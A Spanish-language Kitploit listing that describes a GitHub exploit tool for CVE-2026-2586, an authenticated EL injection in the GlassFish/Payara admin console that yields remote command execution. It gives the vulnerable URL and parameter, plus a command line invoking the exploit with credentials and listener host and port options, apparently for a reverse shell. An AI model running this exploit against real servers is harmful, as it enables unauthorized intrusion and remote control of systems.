Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-2586 — Exploit de inyección EL autenticado para la consola de administración de GlassFish/Payara que permite la ejecución remota de comandos mediante parámetros manipulados en el flujo de configuración del servidor virtual. | Kitploit
Herramientas/GitHubGitHub/deepsecurityresearch/cve-2026-2586
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubdeepsecurityresearch/cve-2026-2586

CVE-2026-2586

Exploit de inyección EL autenticado para la consola de administración de GlassFish/Payara que permite la ejecución remota de comandos mediante parámetros manipulados en el flujo de configuración del servidor virtual.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
2hace 2 mesesAún no revisado

Inyección EL Autenticada en GlassFish RCE (CVE-2026-2586)

Una vulnerabilidad de Inyección de Lenguaje de Expresiones en la Consola de Administración de GlassFish permite a un usuario autenticado inyectar expresiones EL maliciosas en los parámetros procesados por la interfaz web administrativa. Una explotación exitosa puede llevar a la ejecución remota de comandos en el servidor afectado.

La vulnerabilidad fue identificada en el flujo de edición de configuración virtual del servidor, donde los parámetros controlables por el usuario son interpretados de manera insegura por la aplicación.

Esto ocurre porque:

  • La interfaz administrativa procesa parámetros controlados por el usuario dentro de expresiones EL.
  • La entrada no es validada o neutralizada adecuadamente antes de ser interpretada por el backend.
  • Un usuario autenticado en la consola administrativa puede abusar del comportamiento vulnerable para invocar clases y métodos de Java.
  • En un escenario de explotación exitosa, un atacante con credenciales válidas podría ejecutar comandos en el sistema operativo subyacente.

Componente Afectado

  • Producto: Consola de Administración de GlassFish / Payara
  • CVE: CVE-2026-2586
  • Tipo: Inyección de Lenguaje de Expresiones
  • Impacto: Ejecución Remota de Código Autenticada
  • Vector: Interfaz web administrativa

Prueba de Concepto

La prueba se realizó en un entorno local y controlado.

root@kitploit:~
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure

URL vulnerable:

https://glassfish:4848/web/configuration/virtualServerEdit.jsf?name=server&configName=server-config&alertType=success&alertSummary=PAYLOAD&alertDetail=&bare=true

Legal

SOLO USO AUTORIZADO. DeepSecurity Perú no respalda el acceso no autorizado y no asume ninguna responsabilidad por el mal uso de la información proporcionada.

Descargar herramienta